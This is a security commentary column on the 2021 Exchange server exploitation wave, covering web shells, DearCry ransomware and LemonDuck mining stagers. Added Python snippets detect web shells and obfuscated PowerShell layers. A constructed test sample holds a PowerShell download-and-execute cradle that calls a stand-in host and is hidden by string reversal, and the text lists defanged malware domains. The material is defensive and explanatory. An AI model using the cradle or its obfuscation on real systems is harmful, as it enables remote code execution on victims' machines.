Vulnerabilities / Threats

5/10/2021
10:00 AM
John Hammond
Commentary

Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.

On March 1, Huntress learned about new vulnerabilities that would offer an unauthorized actor full control of a Microsoft Exchange server. These vulnerabilities were not yet disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, it seemed Microsoft's initial announcement missed the mark.

Microsoft originally described what came to be dubbed "Exchange Marauder" as "limited and targeted [in scope]," yet practically every version of Exchange was vulnerable, and these servers are publicly facing on the open Internet. Cloud servers were not affected and only on-premises installations of Exchange were susceptible to this attack, but soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were unique files that would process and evaluate code on the server itself and allow anyone who knew the specific key or parameter to run commands and fully control the machine as an administrative user.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine whether the initial patches Microsoft released had taken effect, and if a Web shell was already present, you were already compromised and the patch wouldn't help. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax to run a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or its subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large number of variations of these Web shells and have been archiving them here.)

Initially, these Web shells seemed to slip past almost every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. By now just about every AV and EDR product will get ahead of this, but it shows how this small, simple syntax slipped by and shook up the industry.
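As an added illustration (not code from the original column or from Huntress's tooling), the following Python triages a file inventory like the one pictured above: it flags any server-executable .aspx file under aspnet_client and notes when its last-write time predates Microsoft's March 2 advisory. The inventory records and host names are constructed.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Microsoft's first advisory for these bugs was published March 2, 2021 (per the
# column); a last-write time before that predates public reporting.
DISCLOSURE = datetime(2021, 3, 2)

# aspnet_client normally holds only client-side script resources, so a
# server-executable .aspx page under it is anomalous on its own.
ASPNET_CLIENT = re.compile(r"\\inetpub\\wwwroot\\aspnet_client(\\|$)", re.IGNORECASE)


@dataclass
class FileRecord:
    host: str
    path: str
    modified: datetime  # last-write time as reported by the host


@dataclass
class Finding:
    host: str
    path: str
    modified: datetime
    reasons: list


def triage(records):
    """Return one Finding per .aspx file under aspnet_client, earliest write first."""
    findings = []
    for rec in records:
        folder, _, name = rec.path.rpartition("\\")
        if not name.lower().endswith(".aspx") or not ASPNET_CLIENT.search(folder):
            continue
        reasons = ["server-executable .aspx inside aspnet_client"]
        if rec.modified < DISCLOSURE:
            reasons.append("written before the March 2 public disclosure")
        findings.append(Finding(rec.host, rec.path, rec.modified, reasons))
    return sorted(findings, key=lambda f: f.modified)


# Constructed inventory records, not real telemetry.
SAMPLE_INVENTORY = [
    FileRecord("exch01", r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx",
               datetime(2021, 2, 27, 3, 14)),
    FileRecord("exch01", r"C:\inetpub\wwwroot\aspnet_client\system_web\SmartNav.js",
               datetime(2019, 6, 1)),
    FileRecord("exch02", r"C:\inetpub\wwwroot\aspnet_client\k7q2x9.aspx",
               datetime(2021, 3, 4, 22, 5)),
    FileRecord("exch02", r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\owa\auth\logon.aspx",
               datetime(2020, 11, 10)),
]

for f in triage(SAMPLE_INVENTORY):
    print(f.host, f.path, f.modified, "; ".join(f.reasons))
```

Feed it the real inventory (host, full path, last-write time) and the earliest findings are the ones to compare against the patch date on that host.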

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? While the hackers have complete administrative access, they could drop ransomware, farm this machine into a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

Surprisingly, evidence of cryptocurrency miners is more common than ransomware. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a variable when requesting data from an external server. This gets around HTTP caching and ensures the content that is received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, which is obfuscated by using reversed strings. All of these techniques are attempts for this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the architecture of the victim, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it can continue to run on reboot and throttles the computer's resources to earn more money for the attacker.
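The IEX cradle, the cache-busting timestamp and the reversed-string obfuscation described in the last few paragraphs can all be matched from PowerShell script-block telemetry. The Python below is an added example (not Huntress's or the author's code): it scores one layer against those indicators and peels reversed-string layers to recover the next stage. The two-layer sample and the stager.example.invalid host are constructed.

```python
import re

# Behaviours the column attributes to the LemonDuck stagers, as regexes that
# run over one PowerShell layer (e.g. one Event ID 4104 script-block entry).
INDICATORS = {
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download cradle": re.compile(r"downloadstring|net\.webclient|invoke-webrequest", re.I),
    "cache-busting timestamp": re.compile(r"\?.{0,40}?(get-date|\[datetime\]|ticks)", re.I),
    "reversed-string idiom": re.compile(r"\[-1\s*\.\.\s*-|\[array\]::reverse", re.I),
}
# A quoted literal of 40+ characters: where a reversed layer carries its payload.
LONG_LITERAL = re.compile(r"""(["'])(.{40,}?)\1""")


def indicators(layer: str) -> set:
    """Names of every indicator that fires on this layer."""
    return {name for name, rx in INDICATORS.items() if rx.search(layer)}


def peel_reversed(layer: str):
    """If the layer un-reverses a long literal to build its next stage, return that stage."""
    if "reversed-string idiom" not in indicators(layer):
        return None
    match = LONG_LITERAL.search(layer)
    return match.group(2)[::-1] if match else None


def unwrap(layer: str, max_depth: int = 6) -> list:
    """Indicator sets per layer, outermost first, peeling reversed stages as we go."""
    report = []
    while layer is not None and len(report) < max_depth:
        report.append(indicators(layer))
        layer = peel_reversed(layer)
    return report


# Constructed two-layer sample (not real LemonDuck code): the inner stager is
# stored reversed in the outer layer, which reverses it back and IEXes it.
INNER_STAGER = ("IEX (New-Object Net.WebClient).DownloadString("
                "'http://stager.example.invalid/a.ps1?'+(Get-Date).Ticks)")
OUTER_LAYER = '$s="' + INNER_STAGER[::-1] + '"; IEX (-join $s[-1..-($s.Length)])'

for depth, hits in enumerate(unwrap(OUTER_LAYER)):
    print(f"layer {depth}: {sorted(hits)}")
```

Only the reversed-string idiom is peeled here; other encodings the malware uses would need their own peel step, but the per-layer scoring loop stays the same.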

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities against Exchange. Allegedly, these vulnerabilities have been exploited in the wild, but the impetus to patch should be the same as in March. Two of these new vulnerabilities don't require authentication and can be triggered without user interaction, ultimately gaining the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ...